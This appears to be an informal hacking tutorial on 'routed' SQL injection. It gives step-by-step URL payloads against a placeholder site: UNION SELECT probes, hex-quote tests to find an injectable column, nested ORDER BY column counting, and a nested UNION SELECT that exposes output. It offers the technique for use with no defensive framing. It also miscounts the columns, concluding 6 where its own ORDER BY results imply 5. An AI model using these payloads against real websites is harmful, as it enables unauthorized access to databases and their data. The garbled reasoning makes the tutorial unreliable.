Routed SQLi Method

1. Now I'm going to teach you SQLi Routed Query method.
2.  
3. So, Let's start.
4.  
5. First we've to find vuln columns of target website .
6.  
7. web.com/index.php?id=1' union select 1,2,3,4,5--+
8.  
9. Sadly No Vuln Columns is appearing :\
10.  
11. Let's check in source
12.  
13. view-source:http://web.com/index.php?id=1' union select 1,2,3,4,5--+
14.  
15. :( Again no vuln columns is appearing. :) So, it's time to use Routed Query method to dump vuln column.
16.  
17. Let's find vuln column in which we can use routed SQLi method.
18.  
19. To find vuln columns. We'll use 0x27 = '
20.  
21. web.com/index.php?id=1' union select 1,2,3,4,0x27--+ > No error
22. web.com/index.php?id=1' union select 1,2,3,0x27,5--+ > No error
23. web.com/index.php?id=1' union select 1,2,0x27,4,5--+ > No error
24. web.com/index.php?id=1' union select 1,0x27,3,4,5--+ > Error
25. web.com/index.php?id=1' union select 0x27,2,3,4,5--+ > No Error
26.  
27. Horray ! :D .. We've fine the Vuln columns and it is 2.
28. Now , we've to use Routed SQLi Query
29.  
30. In this query we've to first put "1" in vuln column where " is for query and 1 is the injection point
31. Hope You know that Query without injection point never works. So, Let's begin
32.  
33. Time to find Columns
34.  
35. web.com/index.php?id=1' union select 1,"1 order by 1",3,4,5--+ > No error
36. web.com/index.php?id=1' union select 1,"1 order by 2",3,4,5--+ > No error
37. web.com/index.php?id=1' union select 1,"1 order by 5",3,4,5--+ > No error
38. web.com/index.php?id=1' union select 1,"1 order by 6",3,4,5--+ > Error
39.  
40. So, Columns are 6 :D
41.  
42. Let's dump vuln columns
43.  
44. web.com/index.php?id=1' union select 1,"1 union select 1,2,3,4,5,6",3,4,5--+
45.  
46. :D yeaahhhhhhhh... Vuln columns is appearing